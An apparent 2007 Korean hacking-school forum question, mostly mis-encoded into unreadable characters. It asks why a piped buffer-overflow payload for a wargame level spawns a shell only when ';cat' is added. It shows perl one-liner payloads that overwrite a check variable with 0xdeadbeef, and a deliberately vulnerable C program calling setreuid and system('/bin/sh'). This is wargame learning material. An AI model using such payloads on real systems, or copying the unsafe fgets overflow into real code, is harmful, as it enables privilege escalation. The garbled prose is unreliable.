http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2378 [º¹»ç]
level12 ³Ñ°Üº¸½ÅºÐµéÀº ¾Ë°ÚÁÒ...
¿À¹öÇÃ·Î¿ì ½Ãų º¯¼ö¿¡ ÀԷ¹æ½ÄÀÌ , ÀÎÀÚÀü´Þ ÀÌ ¾Æ´Ï¶ó..
Ç¥ÁØÀÔ·ÂÀ» ÅëÇؼ ÇÁ·Î¼¼¼ ½ÇÇàÈÄ µû·Î ÀÔ·ÂÇØÁà¾ß
ÇÏ´Â Çü½ÄÀ̸é
$./attackme $RET
$./attackme `perl -e 'print "a"x ...'`
ÀÌ·±Çü½ÄÀº ÅëÇÏÁö ¾Ê½À´Ï´Ù.. ÀÎÀÚ·Î Àü´ÞÇØ”fÀÚ Àǹ̰¡ ¾ø´Â°Å°ÚÁÒ.
À̸®Àú¸® µ¹¾Æ´Ù´Ï¸é
$(perl -e 'print "A"x40,"\xef\xbe\xad\xde"';cat) | ./attackme
ÀÌ À̹ýÀÌ ´äÀ̶ó´Âµ¥¿ä...
ÀÌ°É Á¦´ë·Î ÀÌÇØÇÏ°í ³Ñ¾î°¡´Â »ç¶÷Àº ±²ÀåÈ÷ µå¹°¾î º¸ÀÔ´Ï´Ù.
Àú¶ÇÇÑ ±×´ç½Ã´Â ´ë° ³Ñ¾î°¬Áö¸¸(-_-;)
À̸®Àú¸® ±ÛµéÀ» ã¾ÆºÁµµ ÁÁÀº ´äº¯Àº ¾ø±º¿ä..
ÆÄÀÌÇÁ(|) ¸¦ ›§À¸´Ï
ls | more
Çϸé,
ls ¶ó´Â ÇÁ·Î¼¼½º¿Í more À̶ó´Â ÇÁ·Î¼¼½º°¡ µ¿½Ã¿¡ ½ÇÇàµÇ°í.
ÆÄÀÌÇÁ ¿ÞÂÊ ÇÁ·Î¼¼½º(ls) ÀÇ Ç¥ÁØÃâ·Â °á°ú°¡ ¿À¸¥ÂÊ ÇÁ·Î¼¼½º¿¡ ÀÔ·ÂÀÌ
µÇ°ÚÁÒ..
¹°·Ð Àúµµ ±×°Ç ¾Ë°í ÀÖ´Ù¸¸..
´ÙÀ½ ·¹º§ÀÇ ½©À» ¾ò±â À§ÇÑ ¸ðµç Áغñ´Â ´Ù ³¡³»óȲÀÔ´Ï´Ù.
Á¦ ¸»¶æÀº...
°Á ¿¹¸¦ µéÁÒ¹¹..
level14 ¹®Á¦ ÀÔ´Ï´Ù. Á¶±Ý º¯Çü½ÃÄ×½À´Ï´Ù.
½©À» ¶ç¿ì±âÀü¿¡... done À» Ãâ·Â½ÃÅ°±â·Î.
#include
main()
{ int crap;
int check;
char buf[20];
fgets(buf,45,stdin);
if(check == 0xdeadbeef)
{
printf("Done! \n");
setreuid(3095,3095);
system("/bin/sh");
}
}
------------------------------EOF
fgets()¸¦ ÅëÇؼ buf ¿¡ ÀÔ·ÂÇϳ׿ä..
±×·¡¼ Àü »ý°¢Çß½À´Ï´Ù.
(perl -e (»ý·«),"\x00\x00\x00\x00"')|~/attackme
ÇÏ¸é µÇ°Ú±º. À̶ó »ý°¢ÇÏ°í ½ÃµµÇØ”fÀ¸³ª..
done ±ÛÀÚ´Â ¶ßÁö¸¸,
½©Àº ½ÇÇàµÇÁö ¾Ê¾Ò½À´Ï´Ù.
¸Þ¸ð¸®¿¡ ÀÔ·ÂÀº Àߵ̴ܼҸ°µ¥...
¿Ö system("/bin/sh"); À̰͸¸ ½ÇÇàÀÌ ¾ÈµÌÀ»±î¿ä...
¿Ö ;cat À» ³Ö¾î¼ (perl -e (»ý·«)\xde";cat)|./at
ÇÏ¸é ½©ÀÌ ¶ß´Â°É±î¿ä..
ÀÚ¼¼ÇÑ ´äº¯ ºÎŹµå¸³´Ï´Ù.. Á¦°¡ ¾î¶²°É °øºÎÇغ¸¸é ¾Ë°ÔµÇ´Â°É±î¿ä;
|
Hit : 3542 Date : 2007/04/22 09:39
|